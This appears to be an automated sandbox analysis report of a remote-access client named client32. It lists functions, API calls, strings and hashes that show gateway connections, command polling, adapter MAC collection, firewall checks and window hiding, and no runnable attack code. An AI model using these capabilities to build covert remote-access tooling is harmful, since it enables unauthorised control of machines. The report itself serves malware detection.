_License, xrefs: 11061996, 11061A54, 11061A6E, 11061BF6, 11061C60, 11061C7B, 11061C97, 11061D91, 11061FB0, 11062098
/- , xrefs: 11061E3E, 11061E71, 11061EA4
%c%04d%s, xrefs: 110617C4
licensee, xrefs: 11062093
Client, xrefs: 110618A2, 110618E4
%s.%04d.%s, xrefs: 110618E9
_checksum, xrefs: 11061A4F
_include, xrefs: 11061809
_version, xrefs: 11061A69
?starT, xrefs: 11061DB1, 11061DBD

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
API String ID: 716802716-1571441106
Opcode ID: 65d0460f92802e955614a162dd3814ce1d5bf045f2489b592bb5db30f33d702c
Instruction ID: 7d354751decb521dd2b5a9477f267ff04dc70e6f2396a8d0e1f3593140cd268d
Opcode Fuzzy Hash: 65d0460f92802e955614a162dd3814ce1d5bf045f2489b592bb5db30f33d702c
Instruction Fuzzy Hash: D6A2C275E0465A9FEB10CF64CC40BEFB7B9AF44309F0481D9E949A7280EB71AA45CF61

Function 6C3CA980 Relevance: 56.4, APIs: 28, Strings: 4, Instructions: 389
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6C3C5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6C3C8F91,00000000,00000000,6C40B8DA,?,00000080), ref: 6C3C5852

EnterCriticalSection.KERNEL32(6C40B898,?,00000000,00000000), ref: 6C3CAA11
LeaveCriticalSection.KERNEL32(6C40B898), ref: 6C3CAA58
LeaveCriticalSection.KERNEL32(6C40B898), ref: 6C3CAA68
LeaveCriticalSection.KERNEL32(6C40B898), ref: 6C3CAA94
WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6C3CAB0B
socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6C3CAB4E
WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6C3CAB5A
#21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C3CAB8E
#21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C3CABB1
#21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C3CABE3
bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C3CAC18
WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C3CAC21
closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C3CAC29
htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C3CAC65
WSASetBlockingHook.WSOCK32(6C3C63A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C3CAC76
WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C3CAC8F
WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C3CAC96
closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C3CAC9C
WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C3CACFD
WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C3CAD04
closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C3CAD0A
WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C3CAD45
EnterCriticalSection.KERNEL32(6C40B898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C3CAD4F
InitializeCriticalSection.KERNEL32(-6C40CB4A), ref: 6C3CADE6

Part of subcall function 6C3C8FB0: _memset.LIBCMT ref: 6C3C8FE4
Part of subcall function 6C3C8FB0: getsockname.WSOCK32(?,?,00000010,?,02CE2C08,?), ref: 6C3C9005

getsockname.WSOCK32(00000000,?,?), ref: 6C3CAE4B
LeaveCriticalSection.KERNEL32(6C40B898), ref: 6C3CAE60
GetTickCount.KERNEL32 ref: 6C3CAE6C
InterlockedExchange.KERNEL32(?,00000000), ref: 6C3CAE7A

Strings

*TcpNoDelay, xrefs: 6C3CABB8
Cannot connect to gateway %s, error %d, xrefs: 6C3CACA6
Connect error to %s using hijacked socket, error %d, xrefs: 6C3CAB17
Cannot connect to gateway %s via web proxy, error %d, xrefs: 6C3CAD14

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
API String ID: 692187944-2561115898
Opcode ID: ce6b928abdb75d01e75dcfd74f0343509b6e24826006fe3a4f9ece65c3988bc6
Instruction ID: cf02b59df92792f88622661e3e27d1e97ce3f86dc93c6a0e86309a9d0b3da365
Opcode Fuzzy Hash: ce6b928abdb75d01e75dcfd74f0343509b6e24826006fe3a4f9ece65c3988bc6
Instruction Fuzzy Hash: 58E19171B012199FDB10DF64D980BDDB3B5EF49304F1041AAE94AA7780DB719D88CFA2

Function 111365D0 Relevance: 54.7, APIs: 20, Strings: 11, Instructions: 474
windowthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 11136607
IsWindow.USER32(000203F4), ref: 11136665
IsWindowVisible.USER32(000203F4), ref: 11136673
IsWindowVisible.USER32(000203F4), ref: 111366AB
GetForegroundWindow.USER32 ref: 111366C6
EnableWindow.USER32(000203F4,00000000), ref: 111366E0
EnableWindow.USER32(000203F4,00000001), ref: 111366FC
SetForegroundWindow.USER32(00000000), ref: 1113670B
FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11136749
IsWindowVisible.USER32(00000000), ref: 11136758
IsWindowVisible.USER32(000203F4), ref: 11136788
IsIconic.USER32(000203F4), ref: 11136795
GetForegroundWindow.USER32 ref: 1113679F

Part of subcall function 1112E440: ShowWindow.USER32(000203F4,00000000,?,111365A2,00000007,?,?,?,?,?,00000000), ref: 1112E464

Part of subcall function 1112E440: ShowWindow.USER32(000203F4,111365A2,?,111365A2,00000007,?,?,?,?,?,00000000), ref: 1112E476

SetForegroundWindow.USER32(00000000), ref: 111367C5
EnableWindow.USER32(000203F4,00000001), ref: 111367D4
GetLastError.KERNEL32 ref: 11136893
GetLastError.KERNEL32 ref: 1113690B
GetTickCount.KERNEL32 ref: 11136BB8
GetTickCount.KERNEL32 ref: 11136BD9

Part of subcall function 11025850: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,11136C22), ref: 11025858

FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 11136C74

Strings

disableRunplugin, xrefs: 11136818
Reactivate main window, xrefs: 111366B9
ShowNeedsReinstall in 15, user=%s, xrefs: 11136BAB
Audio, xrefs: 11136995
Shell_TrayWnd, xrefs: 11136744
Client, xrefs: 11136699, 1113681D, 11136B7B
File <%s> doesnt exist, e=%d, xrefs: 11136897, 1113690F
MainWnd = %08x, visible %d, valid %d, xrefs: 1113667D
NeedsReinstall, xrefs: 11136B76
HookDirectSound, xrefs: 11136990
HideWhenIdle, xrefs: 11136694

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
API String ID: 2511061093-2542869446
Opcode ID: 91451cb10910a33116faaf6cfc43ca07acbbabef7f17c6efa27caad835e4924a
Instruction ID: c12bfb835dec8db87971db584a6ebfa25760dbf59450f9c22f528e0bf407323c
Opcode Fuzzy Hash: 91451cb10910a33116faaf6cfc43ca07acbbabef7f17c6efa27caad835e4924a
Instruction Fuzzy Hash: 2A022674A11622DFD712DFE4CD84BAAFB65FB8032EF104939E5115728CEB70A940CB66

Function 6C3C91F0 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 97sleepnetworkCOMMON

Download Yara Rule

APIs

#16.WSOCK32(00000000,?,a3=l,00000000,00000000,?,00000007), ref: 6C3C924C
WSAGetLastError.WSOCK32(00000000,?,a3=l,00000000,00000000,?,00000007), ref: 6C3C925B
GetTickCount.KERNEL32 ref: 6C3C9274
Sleep.KERNEL32(00000001,00000000,?,a3=l,00000000,00000000,?,00000007), ref: 6C3C92A8
GetTickCount.KERNEL32 ref: 6C3C92B0
Sleep.KERNEL32(00000014), ref: 6C3C92BC

Strings

a3=l, xrefs: 6C3C9244
*RecvTimeout, xrefs: 6C3C927B
ReadSocket - Error %d reading response, xrefs: 6C3C92F7
ReadSocket - Would block, xrefs: 6C3C928A
hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6C3C922B
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6C3C9226
ReadSocket - Connection has been closed by peer, xrefs: 6C3C92E0

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: CountSleepTick$ErrorLast
String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$a3=l$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
API String ID: 2495545493-1215485911
Opcode ID: 191fd4136ac8d11b331c6bf40f58e5e6913a779c6bd27575a21690f9a1fa8968
Instruction ID: 8c69b4d1e3bea36c48e47daceda981962d522da8835673aa57cdf51061078a6d
Opcode Fuzzy Hash: 191fd4136ac8d11b331c6bf40f58e5e6913a779c6bd27575a21690f9a1fa8968
Instruction Fuzzy Hash: 53319335F40208ABE700EFB8D944FDE77F4EB45328F004569E589D7A40D7759D548B52

Function 6C3D7F80 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154libraryloaderCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6C3D7F9F
LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,?,?,?,?,?,?,?,?,6C3CB916,?,00000100,00000006,00000001), ref: 6C3D7FAC
GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 6C3D7FCB
GetAdaptersInfo.IPHLPAPI(00000000,?,?,00000000,?), ref: 6C3D7FE0
_malloc.LIBCMT ref: 6C3D7FFB
GetAdaptersInfo.IPHLPAPI(00000000,00000000,?,?,00000000,?), ref: 6C3D8015
wsprintfA.USER32 ref: 6C3D807C
_free.LIBCMT ref: 6C3D8110

Part of subcall function 6C3E1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6C3E1C13
Part of subcall function 6C3E1BFD: GetLastError.KERNEL32(00000000), ref: 6C3E1C25

FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 6C3D811C

Strings

%02X%02X%02X%02X%02X%02X, xrefs: 6C3D8076
iphlpapi.dll, xrefs: 6C3D7FA7
GetAdaptersInfo, xrefs: 6C3D7FC5

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: AdaptersFreeInfoLibrary$AddressErrorHeapLastLoadProc_free_malloc_memsetwsprintf
String ID: %02X%02X%02X%02X%02X%02X$GetAdaptersInfo$iphlpapi.dll
API String ID: 1372940892-834977148
Opcode ID: eca08f463b7487f64172963b6c080cec28cce4e6c4fcda41b4df13f6da77811e
Instruction ID: 2f034866d464773a31b40e5cfb39e3856791d51a9c25c00ca5bf720ea38ceea7
Opcode Fuzzy Hash: eca08f463b7487f64172963b6c080cec28cce4e6c4fcda41b4df13f6da77811e
Instruction Fuzzy Hash: 34512A72A042455BCF00DF758C94EEE7BF8AF09304F194166ED45A7641E732B909CBA1

Function 6C3D3130 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 178timethreadCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,?,?,93BF354D,F54CBB65,93BF34B3,FFFFFFFF,00000000), ref: 6C3D31E2
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6C3FECB0), ref: 6C3D31EC
GetSystemTime.KERNEL32(?,F54CBB65,93BF34B3,FFFFFFFF,00000000), ref: 6C3D322A
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6C3FECB0), ref: 6C3D3234
EnterCriticalSection.KERNEL32(6C40B898,?,93BF354D), ref: 6C3D32BE
LeaveCriticalSection.KERNEL32(6C40B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6C3D32D3
GetCurrentThreadId.KERNEL32 ref: 6C3D334D

Part of subcall function 6C3DBA20: __strdup.LIBCMT ref: 6C3DBA3A

Part of subcall function 6C3DBB00: _free.LIBCMT ref: 6C3DBB2D

Strings

ACK=1, xrefs: 6C3D3312
INFO=1, xrefs: 6C3D3304
CMD=POLL, xrefs: 6C3D32F4
1.1, xrefs: 6C3D3240, 6C3D324A

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
String ID: 1.1$ACK=1$CMD=POLL$INFO=1
API String ID: 1510130979-3441452530
Opcode ID: cc738b0d59eb34ba592f5d0802993de9050212041d9af9d2df5e86c3d128cfd7
Instruction ID: 3f42737acd1f47d71131e077d3e5861d360fe73d5869d4cba81b55a54f72fb06
Opcode Fuzzy Hash: cc738b0d59eb34ba592f5d0802993de9050212041d9af9d2df5e86c3d128cfd7
Instruction Fuzzy Hash: 06615072A04208AFCB14EFA4D984EEEB7B9FF49304F05451DE456A7B40DB34A908CF62

Function 11095A00 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 11095A14
CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,11134C9B), ref: 11095A2E
CoCreateInstance.OLE32(?,00000000,00000001,111BBF6C,?,?,?,?,?,?,?,11134C9B), ref: 11095A4B
CoUninitialize.OLE32(?,?,?,?,?,?,11134C9B), ref: 11095A69

Strings

HNetCfg.FwMgr, xrefs: 11095A29
ICF Present: , xrefs: 11095A70

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFromInitializeInstanceProgUninitialize
String ID: HNetCfg.FwMgr$ICF Present:
API String ID: 3222248624-258972079
Opcode ID: 416287ba7a6d29136d2a1af30e77efadae5919c105aa5988b7078af631c7899e
Instruction ID: 73b709afbdd1132fb33507a0e76638f805a81179bb797c8937dcaa11ada4acd3
Opcode Fuzzy Hash: 416287ba7a6d29136d2a1af30e77efadae5919c105aa5988b7078af631c7899e
Instruction Fuzzy Hash: 2011E971F012295FC701DBE28C94AAFFB68AF44704F104429F509E7104E726DE00C7D6

Function 110724D0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 11072600
_memset.LIBCMT ref: 11072779

Strings

_License, xrefs: 110725C1
serial_no, xrefs: 110725BC
NBCTL32.DLL, xrefs: 110726B5

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memset
String ID: NBCTL32.DLL$_License$serial_no
API String ID: 2102423945-35127696
Opcode ID: f0b6fc75bca46a6550bf719f8e494def53ab5a82089fa433cb713ae0d0f3e7f4
Instruction ID: 1614d489088f702805b7c294ab8cd141b683b2d0a452664b2bc22bb5004ab356
Opcode Fuzzy Hash: f0b6fc75bca46a6550bf719f8e494def53ab5a82089fa433cb713ae0d0f3e7f4
Instruction Fuzzy Hash: B5B1AF75E00609AFE704CFA8DC81FAEB7F5FF88300F148169E9499B295DB71A945CB90

Function 11030A50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(1102DEE0,?,00000000), ref: 11030A74

Strings

NSMWClass, xrefs: 11030A7F
NSMWClass, xrefs: 11030A93
Client32, xrefs: 11030A54

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID: Client32$NSMWClass$NSMWClass
API String ID: 3192549508-611217420
Opcode ID: 549b57d017b0e64cca5f47fbeb1213b3a1be2c83ab88cd0cc32149f8ce6b7851
Instruction ID: f670b4642ebf55f0a3c30af44d4e1f7796263ad0dbd8d6979057ef2700c1d797
Opcode Fuzzy Hash: 549b57d017b0e64cca5f47fbeb1213b3a1be2c83ab88cd0cc32149f8ce6b7851
Instruction Fuzzy Hash: D4F0F634801326DFD306EFA5D9D0A96F7E0EB4570C7148035ED2497308EB30AD00CB91

Function 1109D9C0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,7622F550,?,00000000), ref: 1109D9F8
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109DA14
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0048FBF8,0048FBF8,0048FBF8,0048FBF8,0048FBF8,0048FBF8,0048FBF8,111E9B1C,?,00000001,00000001), ref: 1109DA40
EqualSid.ADVAPI32(?,0048FBF8,?,00000001,00000001), ref: 1109DA53

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
